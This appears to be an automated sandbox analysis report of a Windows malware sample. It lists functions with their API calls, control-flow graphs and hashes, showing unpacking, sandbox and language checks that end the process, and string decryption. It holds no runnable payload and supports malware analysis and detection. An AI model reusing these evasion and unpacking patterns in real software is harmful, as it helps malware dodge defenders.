                                          control_flow_graph 334 8e5d77-8e5d90 335 8e5d92-8e5d94 334->335 336 8e5d9b-8e5da7 CreateToolhelp32Snapshot 335->336 337 8e5d96 335->337 338 8e5da9-8e5daf 336->338 339 8e5db7-8e5dc4 Module32First 336->339 337->336 338->339 344 8e5db1-8e5db5 338->344 340 8e5dcd-8e5dd5 339->340 341 8e5dc6-8e5dc7 call 8e5a36 339->341 345 8e5dcc 341->345 344->335 344->339 345->340
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008E5D9F
                                          • Module32First.KERNEL32(00000000,00000224), ref: 008E5DBF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E2000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8e2000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: 9be8a861009f542c36315d6f26fa6441b232b5db39552310cf8255f85d0c3a15
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: E3F09631200B556BD7203BFA9C8DBAE76E8FF4A728F100538F646D20C0DBB0EC454A61
                                          Function 00410430 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880DD0), ref: 004121C1
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880E08), ref: 004121DA
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880E38), ref: 004121F2
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880E70), ref: 0041220A
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880EA8), ref: 00412223
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880EE0), ref: 0041223B
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880F08), ref: 00412253
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880F50), ref: 0041226C
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880F90), ref: 00412284
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00880FC8), ref: 0041229C
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00881000), ref: 004122B5
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,00881038), ref: 004122CD
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,008804B0), ref: 004122E5
                                            • Part of subcall function 00412180: GetProcAddress.KERNEL32(75550000,008804F0), ref: 004122FE
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          • ExitProcess.KERNEL32 ref: 00410458
                                          • GetUserDefaultLangID.KERNELBASE ref: 00410477
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008859C8,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 0041051B
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00410539
                                          • CloseHandle.KERNEL32(?,00000000,?,008859C8,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 0041056B
                                          • ExitProcess.KERNEL32 ref: 00410573
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$EventExitProcess$CloseCreateDefaultHandleLangOpenUserlstrcpy
                                          • String ID:
                                          • API String ID: 1959285754-0
                                          • Opcode ID: 6517d3138269d14e120e1c3bed66e1ae4be7545d0679ea862cc0bb667e130bbb
                                          • Instruction ID: d4afb3438832cf5cad8627414314604812863dbfbc7a654f21b67f6263b1a6d7
                                          • Opcode Fuzzy Hash: 6517d3138269d14e120e1c3bed66e1ae4be7545d0679ea862cc0bb667e130bbb
                                          • Instruction Fuzzy Hash: 1B318070900208AACB04FBF1DC56BEE7379AF08305F14412FF112A61D1DF7C5A848A6E
                                          Function 0089003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 213 89003c-890047 214 890049 213->214 215 89004c-890263 call 890a3f call 890e0f call 890d90 VirtualAlloc 213->215 214->215 230 89028b-890292 215->230 231 890265-890289 call 890a69 215->231 233 8902a1-8902b0 230->233 235 8902ce-8903c2 VirtualProtect call 890cce call 890ce7 231->235 233->235 236 8902b2-8902cc 233->236 242 8903d1-8903e0 235->242 236->233 243 890439-8904b8 VirtualFree 242->243 244 8903e2-890437 call 890ce7 242->244 246 8904be-8904cd 243->246 247 8905f4-8905fe 243->247 244->242 249 8904d3-8904dd 246->249 250 89077f-890789 247->250 251 890604-89060d 247->251 249->247 253 8904e3-890505 249->253 254 89078b-8907a3 250->254 255 8907a6-8907b0 250->255 251->250 256 890613-890637 251->256 264 890517-890520 253->264 265 890507-890515 253->265 254->255 257 89086e-8908be LoadLibraryA 255->257 258 8907b6-8907cb 255->258 259 89063e-890648 256->259 263 8908c7-8908f9 257->263 261 8907d2-8907d5 258->261 259->250 262 89064e-89065a 259->262 266 890824-890833 261->266 267 8907d7-8907e0 261->267 262->250 268 890660-89066a 262->268 269 8908fb-890901 263->269 270 890902-89091d 263->270 271 890526-890547 264->271 265->271 275 890839-89083c 266->275 272 8907e2 267->272 273 8907e4-890822 267->273 274 89067a-890689 268->274 269->270 276 89054d-890550 271->276 272->266 273->261 277 89068f-8906b2 274->277 278 890750-89077a 274->278 275->257 279 89083e-890847 275->279 285 8905e0-8905ef 276->285 286 890556-89056b 276->286 280 8906ef-8906fc 277->280 281 8906b4-8906ed 277->281 278->259 282 890849 279->282 283 89084b-89086c 279->283 287 89074b 280->287 288 8906fe-890748 280->288 281->280 282->257 283->275 285->249 289 89056d 286->289 290 89056f-89057a 286->290 287->274 288->287 289->285 293 89059b-8905bb 290->293 294 89057c-890599 290->294 297 8905bd-8905db 293->297 294->297 297->276
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0089024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 1f131b03efb52d8d2cb776e081289fe3a7e0bf253f2524d73c33877c8b79cae2
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 5C526974A01229DFDB64CF98C984BA8BBB1BF09314F1480D9E54DAB351DB30AE85DF15
                                          Function 00410544 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008859C8,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 0041051B
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00410539
                                          • CloseHandle.KERNEL32(00000000), ref: 0041054A
                                          • Sleep.KERNEL32(00001770), ref: 00410555
                                          • CloseHandle.KERNEL32(?,00000000,?,008859C8,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 0041056B
                                          • ExitProcess.KERNEL32 ref: 00410573
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: e403f8ffbb91593beead32c91cec5554c3c6bf1e1477261f753fe489317f82a5
                                          • Instruction ID: 09006b0c0d094d90b807d966d12cc723470bc1340685d3f592327e246f0b06a7
                                          • Opcode Fuzzy Hash: e403f8ffbb91593beead32c91cec5554c3c6bf1e1477261f753fe489317f82a5
                                          • Instruction Fuzzy Hash: E0F05E70940219BFE710EBA0DC4ABFE7276AB04701F24561BB512A21D1DFF856C1CE6A
                                          Function 004010B0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,0041046D), ref: 004010CB
                                          • VirtualAllocExNuma.KERNELBASE(00000000,?,?,0041046D), ref: 004010D2
                                          • ExitProcess.KERNEL32 ref: 004010E3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AllocCurrentExitNumaVirtual
                                          • String ID:
                                          • API String ID: 1103761159-0
                                          • Opcode ID: 02f01bea4ca8033e23f9450e388b7e8141895c992345e94fa4242c0d06c86fb7
                                          • Instruction ID: a6aaf47c391cb192c0c5c3f1db6919c13433da3f39274503cfdd87793102492c
                                          • Opcode Fuzzy Hash: 02f01bea4ca8033e23f9450e388b7e8141895c992345e94fa4242c0d06c86fb7
                                          • Instruction Fuzzy Hash: 5EE0CD70985308FFE7105BD1DC4EB4D76B8DB00B15F205056F708B75D0CAB82940469C
                                          Function 00890E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 347 890e0f-890e24 SetErrorMode * 2 348 890e2b-890e2c 347->348 349 890e26 347->349 349->348
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,00890223,?,?), ref: 00890E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,00890223,?,?), ref: 00890E1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: e153f05878e9c0a74f13e5799d4f8d311248a5422619a5405020419e5db8524d
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: 26D0123514512877DB003A94DC09BCD7B1CDF05B62F048411FB0DD9080C770994046E5
                                          Function 00401040 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 401040-401060 VirtualAlloc 351 401062-401065 350->351 352 401067-40106f 350->352 351->352 353 401071-401097 call 4113e0 VirtualFree 352->353 354 40109d-4010a1 352->354 353->354
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,004010EE,?,?,0041046D), ref: 00401053
                                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,004010EE,?,?,0041046D), ref: 00401097
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: 2127c79f024b7626c24b81512452acd09f02aa6690b884efd6c8790533b1e997
                                          • Instruction ID: 012b993cb448760cb48d5cdc1528a6a66ba78387253dacbad9f7badd6063d305
                                          • Opcode Fuzzy Hash: 2127c79f024b7626c24b81512452acd09f02aa6690b884efd6c8790533b1e997
                                          • Instruction Fuzzy Hash: AAF0E271681308BBE7149BB4AC59FAFB398A705B45F304859FA44E3290D5719E0086A4
                                          Function 00403810 Relevance: 2.5, APIs: 2, Instructions: 36COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          • Opcode ID: f4314c0d61d3668132984408b610dbaf50f4d41d13c4530c7f71ebed696481c3
                                          • Instruction ID: b4e7f847ca15252535ac621e6aec1c0ad60fe03609a2dc74cb973100ed748bc2
                                          • Opcode Fuzzy Hash: f4314c0d61d3668132984408b610dbaf50f4d41d13c4530c7f71ebed696481c3
                                          • Instruction Fuzzy Hash: 17F0F4F5D10108BBCB00EFA5EC469DEB778AF44344F004179FA0AA7251FA35AB148BD5
                                          Function 00401130 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 368 401130-401139 call 4107d0 370 40113e-401149 call 4114a0 368->370 373 40114b-401162 call 410790 call 4114a0 370->373 374 40116c-40116d 370->374 373->374 379 401164-401166 ExitProcess 373->379
                                          APIs
                                            • Part of subcall function 004107D0: GetProcessHeap.KERNEL32(00000000,00000104,0041047C,00414682), ref: 004107DD
                                            • Part of subcall function 004107D0: RtlAllocateHeap.NTDLL(00000000), ref: 004107E4
                                            • Part of subcall function 004107D0: GetComputerNameA.KERNEL32(?,00000104), ref: 004107FC
                                            • Part of subcall function 00410790: GetProcessHeap.KERNEL32(00000000,00000104,00401157,008859E0,0041047C,00414682), ref: 0041079D
                                            • Part of subcall function 00410790: RtlAllocateHeap.NTDLL(00000000), ref: 004107A4
                                            • Part of subcall function 00410790: GetUserNameA.ADVAPI32(?,00000104), ref: 004107BC
                                          • ExitProcess.KERNEL32 ref: 00401166
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                                          • String ID:
                                          • API String ID: 3550813701-0
                                          • Opcode ID: 5dfcc54ffe1d84541331d60e85deac2731487983c969969cd2bbe61fc7e4cd1a
                                          • Instruction ID: 009d718b1f3313d18a5447f6fd2ac7483f7ff0e3748da63a0536e0034ff0befe
                                          • Opcode Fuzzy Hash: 5dfcc54ffe1d84541331d60e85deac2731487983c969969cd2bbe61fc7e4cd1a
                                          • Instruction Fuzzy Hash: 6EE0EC75D003005ADA0477B67C46BA7329D5B1476EF08142BBA09D76A2ED79F88046A9
                                          Function 008E5A36 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008E5A87
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E2000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8e2000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: 407d6f7bb01569ab80105a782e4e1c1c5b307a9889183e7b8603cfd879d4ba76
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 5E112B79A00208EFDB01DF99C985E98BBF5EF08350F0580A5F9489B362D371EA50DB80

                                          Non-executed Functions

                                          Function 008988D7 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0089890A
                                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00898928
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00898933
                                          • memcpy.MSVCRT ref: 008989C9
                                          • lstrcat.KERNEL32(?,004146BB), ref: 008989FA
                                          • lstrcat.KERNEL32(?,004146BE), ref: 00898A0E
                                          • lstrcat.KERNEL32(?,004146BF), ref: 00898A2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 1498829745-0
                                          • Opcode ID: 134917050474b7d471302aba955204530b09060d99e16b36599f7380df89fb26
                                          • Instruction ID: a17c08addfeabe1fc2718cde13bedcb80887db9ff9d06846a9f1e8296631ebe6
                                          • Opcode Fuzzy Hash: 134917050474b7d471302aba955204530b09060d99e16b36599f7380df89fb26
                                          • Instruction Fuzzy Hash: F8416F74D0421ADFCB10DF94DC89BEEB7B9FB48344F1481AAE509A7280DB745A84CF95
                                          Function 00408670 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004086A3
                                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004086C1
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004086CC
                                          • memcpy.MSVCRT ref: 00408762
                                          • lstrcat.KERNEL32(?,004146BB), ref: 00408793
                                          • lstrcat.KERNEL32(?,004146BE), ref: 004087A7
                                          • lstrcat.KERNEL32(?,004146BF), ref: 004087C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 1498829745-0
                                          • Opcode ID: 8a73fd9fc10429a265bf8a2eff6282a9fe706f3605447b558db16ccf288bb887
                                          • Instruction ID: 759f9b94f9dab68f757ef779266350902495f1571f1d3faef8656b0f6ccbf499
                                          • Opcode Fuzzy Hash: 8a73fd9fc10429a265bf8a2eff6282a9fe706f3605447b558db16ccf288bb887
                                          • Instruction Fuzzy Hash: D3415074904219DFDB10DF90DD89BEEB7B9BB84304F2081A9E509A7280DB745A84CF95
                                          Function 0089092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$GetProcAddress.$l
                                          • API String ID: 0-2784972518
                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction ID: adcd894b9609cd8df190261d58f918eeacb957f99d2b879a591d27d843b4e4d9
                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction Fuzzy Hash: 713139B6900619DFDB10DF99C880AAEBBF5FF48328F29414AD841E7211D771EA45CFA4
                                          Function 00896417 Relevance: 3.1, APIs: 2, Instructions: 55encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894265,00000000,00000000), ref: 00896446
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894265,00000000,00000000), ref: 00896481
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: a6a986cbc8e55ee5929cc1eba7284e3845e126ec7f7828f9e015dbd4a27db1fc
                                          • Instruction ID: 74b32dad661fcf59a1ac1bacc30024e4203d157c2211ef7f4e1affd5b36176da
                                          • Opcode Fuzzy Hash: a6a986cbc8e55ee5929cc1eba7284e3845e126ec7f7828f9e015dbd4a27db1fc
                                          • Instruction Fuzzy Hash: 87119374240308AFEB10CFA4CC95FAA77BAEB89714F248059FE159B2D0CB75A940CB54
                                          Function 004061B0 Relevance: 3.1, APIs: 2, Instructions: 55encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00403FFE,00000000,00000000), ref: 004061DF
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00403FFE,00000000,00000000), ref: 0040621A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: a6a986cbc8e55ee5929cc1eba7284e3845e126ec7f7828f9e015dbd4a27db1fc
                                          • Instruction ID: 729aa2d3dc43638b2e33bd8714632e0c107de5e481ca57dda5c091d028960453
                                          • Opcode Fuzzy Hash: a6a986cbc8e55ee5929cc1eba7284e3845e126ec7f7828f9e015dbd4a27db1fc
                                          • Instruction Fuzzy Hash: FB11A274240308AFEB10CFA4CC95FAA77B6EB89714F208099F9159B3D0C7B6A941CB94
                                          Function 00401100 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00410468,00414682), ref: 0040110A
                                          • ExitProcess.KERNEL32 ref: 0040111E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitInfoProcessSystem
                                          • String ID:
                                          • API String ID: 752954902-0
                                          • Opcode ID: a3b717a55ee685600f595bc677bd0d4703727e43f2e371a15f31c4c66d20cbad
                                          • Instruction ID: f9823d39dc976000c3da713aa6482b3ec4faedef8429ce93733dd161ba641eda
                                          • Opcode Fuzzy Hash: a3b717a55ee685600f595bc677bd0d4703727e43f2e371a15f31c4c66d20cbad
                                          • Instruction Fuzzy Hash: BBD05E74D0030CCFCB04DFE09D895DDBBB9FB0C311F141456D90573290DA305450CAA5
                                          Function 008E5654 Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E2000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8e2000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction ID: 2a9635e6a32ae64aa452f477ad345632ba43535f0ecccf6fe6c5d7bb3cf36bba
                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction Fuzzy Hash: BC1170723405009FD744DF5ADC81FA673EAFB99328B698055ED04CB316D675EC01C760
                                          Function 008A8029 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: adc30a1db24ea9d074b98ce1ae4fdb2e37112b58be16ed2b7118c8619b8e90a7
                                          • Instruction ID: db5e6c91cca67ae90cb676a9e8c6fa7568263c16057e7cbceeb6966ea00e904f
                                          • Opcode Fuzzy Hash: adc30a1db24ea9d074b98ce1ae4fdb2e37112b58be16ed2b7118c8619b8e90a7
                                          • Instruction Fuzzy Hash: AE018F2291D3D19FCB57CF3488686427FB2EE4720479A19DEC4C18F523D621858AC742
                                          Function 00890D90 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction ID: 1b35e33e417a343a45b1bc88ba0e5a1cab096ecf583cc3962548dd80f0843350
                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction Fuzzy Hash: A3018F76A006048FDF21EF64C804BAE33F5FB86316F5945A5D90AD7281E774A9418F90
                                          Function 008A22D7 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
